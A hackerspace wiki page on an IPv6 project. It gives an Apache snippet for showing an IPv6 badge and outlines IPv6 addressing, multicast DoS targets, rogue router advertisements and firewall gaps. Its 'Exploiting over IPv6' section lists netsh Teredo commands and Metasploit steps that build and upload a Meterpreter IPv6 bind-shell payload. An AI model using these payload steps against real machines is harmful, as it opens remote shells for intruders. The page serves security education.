brmlab

User Tools

Site Tools

You are here: Hackerspace Prague » Projects » IPv6
project:ipv6:start

Table of Contents

IPv6

IPv6
founder: ruza
depends on:
interested: kxt, biiter
software license:
hardware license:
status: active

~~META: status = active &relation firstimage = :project:ipv6-badge-blk-128-trans.png ~~

Goals of the Project

  • IPv6 deployment
  • education
  • security research related to IPv6

Status and Plan

The project is currently in the planning stage.

World IPv6 day (8 June 2011)

  • [DONE] we participate in World IPv6 day

World IPv6 launch (6 June 2012)

6or4 checkicon guy for your website

Check your web server support SSI

/etc/apache2/sites-enabled/000-default
SetEnvIf Server_Addr "^2001:" IPV6
wget -4 http://www.cznog.eu/images/checkicon.php -O ./images/ipv4.png
wget -6 http://www.cznog.eu/images/checkicon.php -O ./images/ipv6.png
index.html
<!--#if expr="$IPV6"--><img src="/images/ipv6.png" alt="IPv6 smile" />
  <!--#else -->        <img src="/images/ipv4.png" alt="IPv4 sad" />
<!--#endif -->

Topics (attack vectors)

Introduction to IPv6

IPv6 Addressing Architecture

  • The address notation for IPv6 is a group of 16 2-digit hexadecimal numbers, separated with a ':', global addresses are allocated by IANA (Ip Address Not Available)
  • “::” stands for a string of 0 bits.
  • Special addresses are ::1 for loopback
  • ::FFFF:<IPv4 address> for IPv4-mapped-on-IPv6
  • fe00::0/8 ip6-localnet
  • ff00::0 ip6-mcastprefix
  • fe80::/10 individuální lokální linkové
  • broadcast → multicast

Finding IPv6 hosts

  • DNS (highly dependent), server logs
  • MAC address allocations (EUI-64 standard)
  • DoS targets 1
    • 3 site-local multicast addresses
      • FF05::2 all-routers
      • FF05::FB mDNSv6
      • FF05::1:3 all DHCP servers
    • Several link-local multicast addresses
      • FF02::1 all nodes
      • FF02::2 all routers
      • FF02::F all UPnP
      • … (RFCs :?:)
    • Some deprecated (RFC 3879) site-local addresses but still used
      • FEC0:0:0:FFFF::1 DNS server

http://www.abclinuxu.cz/clanky/architektura-ipv6-adresace-uzlu-1

IPv6 Header Fields

IPv6 Extension Headers

  • unlimited size of header chain DoS aka Routing header DoS vs RFC 5095

IPv6 Privacy Extensions (RFC 3041)

  • temporary address for host client application (eg. www browser)
  • random 64bit ID
  • can be disabled by Group POlicy Object (win) or DHCP

IPv6 Options

IPsec

  • IPsec not required by IPv6
  • blinds IPS, firewalls, ACLs
  • network security relies more on endpoint security!
  • DoS, malformed packets, spoofed and unprotected IKE messages (ICSA Labs methology)

Internet Control Message Protocol version 6 (ICMPv6)

  • more relied upon
  • moar types

Neighbor Discovery for IPv6

  • NDP replaces ARP
    • not authenticated
    • static entries overwritten by dynamic ones
  • SEND (SEcure Neighbor Discovery)

Multicast Listener Discovery

Mobility (RFC 3775)

Address Auto-configuration

  • stateles (SLAAC)
    • rogue Router Advertisement (DoS, MiTM)
    • fe80:: (local link) + MAC (EUI-64)
  • statefull DHCPv6, RFC 3315

Dynamic Host Configuration Protocol version 6 (DHCPv6)

Application support for IPv6

IPv6 firewalls

  • ipv6 default policy allowed, not inspected
  • imany icmp6 types needs to be allowed too
  • how to build and maintain antispam reputation databases?
  • fragmentation and reassembly is done only by the end system

Transition/co-existence technologies (6to4, Teredo, ISATAP, etc.)

Security Implications of IPv6 on IPv4-only networks

Exploiting over IPv6

Windows

int ipv6 install
netsh int ipv6 set teredo [enterpriseclient|client] #(enterpriseclient gives you and public ip)
netsh int ipv6 show teredo # we need qualified State

msfpayload windows/meterpreter/bind_ipv6_tcp LPORT=1337 X > bind.exe
upload bind.exe
msf exploit(handler) > set PAYLOAD windows/meterpreter/bind_ipv6_tcp

http://vimeo.com/15243189

IPv6 implementation (network devices testing)

Papers, books

Tools

project/ipv6/start.txt · Last modified: 2016/11/28 03:28 by ruza